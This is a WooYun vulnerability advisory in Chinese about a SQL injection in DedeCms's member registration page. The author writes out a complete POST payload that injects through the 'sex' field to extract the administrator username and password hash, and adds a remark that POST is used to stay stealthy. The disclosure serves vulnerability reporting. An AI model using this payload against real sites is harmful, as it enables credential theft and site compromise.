当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015416

漏洞标题:老树新花DedeCms SQL注射漏洞再利用

相关厂商:DedeCms

漏洞作者: c4rp3nt3r

提交时间:2012-11-29 17:40

修复时间:2013-01-13 17:41

公开时间:2013-01-13 17:41

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-01-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.

详细说明:

跟这个漏洞

 WooYun: Dedecms SQL注射导致审核机制绕过漏洞 


是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
POST提交以下数据,其实不用POST提交的,这样隐蔽点.

http://bt/de/member/reg_new.php
POST dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=


查看源代码,头像哪里就有好玩的东西了.

漏洞证明:

dede-sql.png

修复方案:

元芳你怎么看

版权声明:转载请注明来源 c4rp3nt3r@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝